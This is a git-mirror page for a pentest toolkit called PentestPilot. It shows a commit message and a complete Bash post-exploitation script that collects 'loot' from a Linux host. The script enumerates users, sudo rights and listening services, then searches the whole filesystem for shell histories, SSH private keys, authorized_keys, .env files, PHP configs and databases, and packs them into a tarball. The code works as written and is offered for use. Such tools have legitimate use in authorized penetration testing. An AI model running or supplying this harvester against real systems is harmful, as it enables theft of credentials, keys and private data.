mirror of
https://github.com/0xMarcio/PentestPilot.git
synced 2026-02-13 05:22:54 +00:00
461c14d676
Initial commit of PentestPilot — AI‑assisted pentest recon and orchestration toolkit.\n\nHighlights:\n- Resumeable pipelines (full_pipeline) with manifest state and elapsed timings\n- Rich dashboard (colors, severity bars, durations, compact/json modes)\n- Web helpers: httpx→nuclei auto, tech routing + quick scanners\n- Agents: multi‑task orchestrator (web/full/ad/notes/post) with resume\n- AD/SMB, password utils, shells, transfer, privesc, tunnels\n- QoL scripts: proxy toggle, cleanup, tmux init, URL extractor\n- Docs: README (Quick Start + Docs Index), HOWTO (deep guide), TOOLKIT (catalog with examples)\n\nStructure:\n- bin/automation: pipelines, dashboard, manifest, resume, tech_actions\n- bin/web: routing, scanners, helpers\n- bin/ai: orchestrators + robust AI utils\n- bin/ad, bin/passwords, bin/shells, bin/transfer, bin/privesc, bin/misc, bin/dns, bin/scan, bin/windows, bin/hashes\n- HOWTO.md and TOOLKIT.md cross‑linked with examples\n\nUse:\n- settarget <target>; agent full <domain|hosts.txt>; dashboard --compact\n- See HOWTO.md for setup, semantics, and examples.
82 lines
2.4 KiB
Bash
Executable File
82 lines
2.4 KiB
Bash
Executable File
#!/usr/bin/env bash
|
|
set -euo pipefail
|
|
|
|
# Safe, targeted loot collection for Linux. Default is conservative.
|
|
# Config via env:
|
|
# LOOT_DIR (default: ./loot)
|
|
# MAX_SIZE (default: 20971520 bytes = 20MB)
|
|
# INCLUDE_HIST (default: 1)
|
|
# INCLUDE_KEYS (default: 1)
|
|
# INCLUDE_CONFIGS (default: 1)
|
|
# INCLUDE_DB (default: 0)
|
|
# EXTRA_GLOBS (space-separated, optional)
|
|
|
|
LOOT_DIR=${LOOT_DIR:-loot}
|
|
MAX_SIZE=${MAX_SIZE:-20971520}
|
|
INCLUDE_HIST=${INCLUDE_HIST:-1}
|
|
INCLUDE_KEYS=${INCLUDE_KEYS:-1}
|
|
INCLUDE_CONFIGS=${INCLUDE_CONFIGS:-1}
|
|
INCLUDE_DB=${INCLUDE_DB:-0}
|
|
EXTRA_GLOBS=${EXTRA_GLOBS:-}
|
|
|
|
mkdir -p "$LOOT_DIR/listings" "$LOOT_DIR/files"
|
|
|
|
echo "[+] Collecting system summaries"
|
|
{
|
|
echo "# uname"; uname -a
|
|
echo "# os-release"; cat /etc/os-release 2>/dev/null || true
|
|
echo "# id"; id
|
|
echo "# users"; cat /etc/passwd | cut -d: -f1,3,4
|
|
echo "# sudo -n -l"; sudo -n -l 2>&1 || true
|
|
echo "# net"; ss -tunlp 2>/dev/null || netstat -tunlp 2>/dev/null || true
|
|
} > "$LOOT_DIR/listings/summary.txt"
|
|
|
|
collect_list() {
|
|
pat="$1"; hint="$2"
|
|
echo "[+] Searching: $hint ($pat)"
|
|
rg -n --hidden -S -g '!proc/**' -g '!sys/**' -g '!dev/**' -g '!run/**' -g '!var/log/**' --glob "$pat" / 2>/dev/null | awk -F: '{print $1}' | sort -u
|
|
}
|
|
|
|
to_pack=$(mktemp)
|
|
trap 'rm -f "$to_pack"' EXIT
|
|
|
|
if [[ "$INCLUDE_HIST" == "1" ]]; then
|
|
collect_list "**/.bash_history" "history" >> "$to_pack"
|
|
collect_list "**/.zsh_history" "history" >> "$to_pack"
|
|
fi
|
|
|
|
if [[ "$INCLUDE_KEYS" == "1" ]]; then
|
|
collect_list "**/.ssh/id_*" "ssh keys" >> "$to_pack"
|
|
collect_list "**/authorized_keys" "authorized_keys" >> "$to_pack"
|
|
fi
|
|
|
|
if [[ "$INCLUDE_CONFIGS" == "1" ]]; then
|
|
collect_list "**/*.conf" "configs" >> "$to_pack"
|
|
collect_list "**/.env" ".env" >> "$to_pack"
|
|
collect_list "**/*config*.php" "php configs" >> "$to_pack"
|
|
fi
|
|
|
|
if [[ "$INCLUDE_DB" == "1" ]]; then
|
|
collect_list "**/*.db" "sqlite db" >> "$to_pack"
|
|
collect_list "**/*.sqlite*" "sqlite db" >> "$to_pack"
|
|
collect_list "**/*.sql" "sql dumps" >> "$to_pack"
|
|
fi
|
|
|
|
for g in $EXTRA_GLOBS; do
|
|
collect_list "$g" "extra" >> "$to_pack"
|
|
done
|
|
|
|
echo "[+] Filtering paths; max size: $MAX_SIZE"
|
|
final=$(mktemp)
|
|
while IFS= read -r f; do
|
|
[[ -f "$f" ]] || continue
|
|
s=$(stat -c %s "$f" 2>/dev/null || stat -f %z "$f" 2>/dev/null || echo 0)
|
|
if [[ "$s" -le "$MAX_SIZE" ]]; then
|
|
echo "$f" >> "$final"
|
|
fi
|
|
done < <(sort -u "$to_pack")
|
|
|
|
tar -czf "$LOOT_DIR/files/linux_loot.tgz" -T "$final" 2>/dev/null || true
|
|
echo "[+] Loot archived: $LOOT_DIR/files/linux_loot.tgz"
|
|
|